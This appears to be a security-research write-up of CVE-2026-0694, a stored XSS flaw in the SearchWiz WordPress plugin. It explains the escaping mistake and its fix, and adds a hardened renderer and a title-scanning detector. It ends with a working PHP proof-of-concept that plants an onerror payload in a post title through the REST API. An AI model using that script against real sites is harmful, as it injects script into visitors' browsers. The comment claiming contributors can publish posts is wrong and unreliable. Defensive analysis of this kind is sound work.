Atomic Edge analysis of CVE-2026-0694 (metadata-based):
The SearchWiz plugin for WordPress, versions up to and including 1.0.0, contains an authenticated stored cross-site scripting (XSS) vulnerability. The flaw exists in the plugin’s search results output, allowing attackers with contributor-level or higher permissions to inject malicious scripts via post titles. These scripts execute when a victim views a search results page, leading to client-side compromise.
Atomic Edge research identifies the root cause as improper output escaping. The vulnerability description states the plugin uses `esc_attr()` instead of `esc_html()` when outputting post titles in search results. This is a classic context mismatch: `esc_attr()` escapes for HTML attribute contexts, not for direct HTML body output where titles are likely placed. The CWE-79 classification confirms this as improper neutralization of input during web page generation. This conclusion is inferred from the provided description and CWE, as no source code diff is available for confirmation.
Exploitation requires an authenticated attacker with at least contributor-level access. The attacker creates or edits a post, injecting a malicious JavaScript payload into the post title field. A payload like `` is typical. When any site user, including unauthenticated visitors, performs a search that returns the malicious post, the title renders without proper HTML escaping, causing script execution in the victim’s browser. The attack vector is the standard WordPress post creation/editing interface, likely at `/wp-admin/post.php` or via the REST API at `/wp-json/wp/v2/posts`.
Remediation requires correcting the output escaping function. The plugin must replace `esc_attr()` with `esc_html()` or a more appropriate function like `wp_kses_post()` for the specific HTML context where the post title is displayed in search results. Proper input validation on the post title field, while a good practice, is not the primary fix for this output-based XSS. The patch should also ensure all dynamic content rendered in the plugin’s frontend templates uses context-appropriate escaping.
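To make the remediation concrete, the following is an added example written for this page; it is not the SearchWiz plugin's code, and the function names `render_result_vulnerable` and `render_result_hardened` are invented here. It shows a minimal search-result renderer in the raw-output form beside one that escapes each interpolation for the HTML context it lands in (text node, attribute value, URL). Outside WordPress, `esc_html()`, `esc_attr()` and `esc_url()` are polyfilled with `htmlspecialchars()` so the script runs stand-alone; inside WordPress the real functions are used.

```php
<?php
// Added example (not from the advisory or the SearchWiz plugin).
// Polyfills so the script runs outside WordPress; real functions win when loaded in WP.
if (!function_exists('esc_html')) {
    function esc_html(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_url')) {
    // Hypothetical stand-in for WordPress esc_url(): allow only http(s), then attribute-encode.
    function esc_url(string $url): string {
        if (!preg_match('#^https?://#i', $url)) {
            return '';
        }
        return htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Vulnerable pattern: the untrusted title is dropped into markup unescaped,
// once as a text node and once inside an attribute. Kept only for comparison.
function render_result_vulnerable(array $post): string {
    return '<li><a href="' . $post['permalink'] . '" title="' . $post['title'] . '">'
         . $post['title'] . '</a></li>';
}

// Hardened pattern: each sink is escaped for its own context.
//   text node        -> esc_html()
//   attribute value  -> esc_attr()
//   href / src       -> esc_url()
function render_result_hardened(array $post): string {
    return '<li><a href="' . esc_url($post['permalink'])
         . '" title="' . esc_attr($post['title']) . '">'
         . esc_html($post['title']) . '</a></li>';
}

// Constructed sample post, standing in for one row of a WP_Query search result.
$sample = [
    'permalink' => 'https://example.test/?p=42',
    'title'     => 'Exploit Post <img src=x onerror=alert(1)>',
];

echo "Vulnerable:\n" . render_result_vulnerable($sample) . "\n\n";
echo "Hardened:\n"   . render_result_hardened($sample) . "\n";
```

The hardened output turns the constructed title into `&lt;img src=x onerror=alert(1)&gt;` in both the text node and the `title` attribute, which the browser shows as literal text. The rule CWE-79 points at is to choose the escaping function by the context of the sink, never by where the data came from; a title is untrusted even when it was typed by a logged-in contributor.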
The impact of successful exploitation is client-side code execution in the context of the vulnerable site. Attackers can steal session cookies, perform actions as the victim user, deface the site, or redirect users to malicious domains. The CVSS score is 6.4 (Medium), reflecting a network attack vector, low attack complexity, low privileges required, no user interaction for execution, a changed scope (the victim’s browser), and low confidentiality and integrity impact.
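For responders checking whether a site has already been hit, the following is an added example (not part of the advisory) that flags stored post titles carrying markup, inline event handlers, or a `javascript:` scheme, since the post title is the storage location this vulnerability abuses. On a live site the rows would come from `$wpdb->get_results()` against the posts table; here a constructed array in `wp_posts` shape stands in so the check runs offline. The function names `title_looks_suspicious` and `scan_titles` are invented here.

```php
<?php
// Added example (not from the advisory): triage check over stored post titles.
// Live-site data source (WordPress API, shown for reference, not executed here):
//   $wpdb->get_results("SELECT ID, post_author, post_title FROM {$wpdb->posts}", ARRAY_A);

function title_looks_suspicious(string $title): bool {
    // Decode entities first so an entity-encoded title is judged on what it would become
    // if a template decoded or double-rendered it; this over-flags slightly, fine for triage.
    $decoded = html_entity_decode($title, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $patterns = [
        '/<[a-z!\/]/i',        // start of a tag-like token: <img, </a, <!--
        '/\bon[a-z]+\s*=/i',   // inline event handler attribute: onerror=, onload=, ...
        '/javascript\s*:/i',   // javascript: URL scheme
    ];
    foreach ($patterns as $re) {
        if (preg_match($re, $decoded)) {
            return true;
        }
    }
    return false;
}

// Returns the rows whose title should be reviewed, keyed by post ID.
function scan_titles(array $rows): array {
    $hits = [];
    foreach ($rows as $row) {
        if (title_looks_suspicious($row['post_title'])) {
            $hits[$row['ID']] = $row;
        }
    }
    return $hits;
}

// Constructed sample rows (not real site data); IDs 2 and 5 are the ones worth a look.
$rows = [
    ['ID' => 1, 'post_author' => 2, 'post_title' => 'Quarterly update'],
    ['ID' => 2, 'post_author' => 7, 'post_title' => 'Exploit Post <img src=x onerror=alert(1)>'],
    ['ID' => 3, 'post_author' => 4, 'post_title' => 'Comparing a < b and b > c'],
    ['ID' => 4, 'post_author' => 7, 'post_title' => 'Turn the lights on = energy saved'],
    ['ID' => 5, 'post_author' => 7, 'post_title' => 'Click here: javascript:alert(1)'],
];

foreach (scan_titles($rows) as $id => $row) {
    printf("review post %d (author %d): %s\n", $id, $row['post_author'], $row['post_title']);
}
```

The benign rows with a lone `<` or the word "on" are deliberately included to show that the patterns key on tag-like tokens and `on<name>=` handlers rather than on single characters. A hit is a lead, not a verdict: confirm by checking the post's revision history and the author account, and treat any flagged title from a contributor account as a reason to review that account's other posts.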
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-0694 - SearchWiz <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Post Title
<?php
$target_url = 'http://target-site.local/wp-json/wp/v2/posts';
$username = 'contributor_user';
$password = 'contributor_pass';
// Payload: Classic XSS vector for HTML body context.
$malicious_title = 'Exploit Post <img src=x onerror=alert(\'XSS via SearchWiz\')>';
// Assumption: The plugin's vulnerable output is triggered when a post appears in search results.
// This PoC creates a post via the WordPress REST API, which contributor-level users can access.
$post_data = array(
    'title'   => $malicious_title,
    'content' => 'This post has a malicious title.',
    'status'  => 'publish' // Contributor can publish posts.
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    'Accept: application/json'
));
curl_setopt($ch, CURLOPT_USERPWD, "$username:$password");
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code >= 200 && $http_code < 300) {
    $resp_data = json_decode($response, true);
    $post_id = $resp_data['id'] ?? 'unknown';
    echo "[+] Post created with ID: $post_id\n";
    echo "[+] Visit the site's search results page after searching for a term matching this post.\n";
    echo "[+] The XSS payload in the title should execute.\n";
} else {
    echo "[-] Post creation failed. HTTP Code: $http_code\n";
    echo "[-] Response: $response\n";
}
?>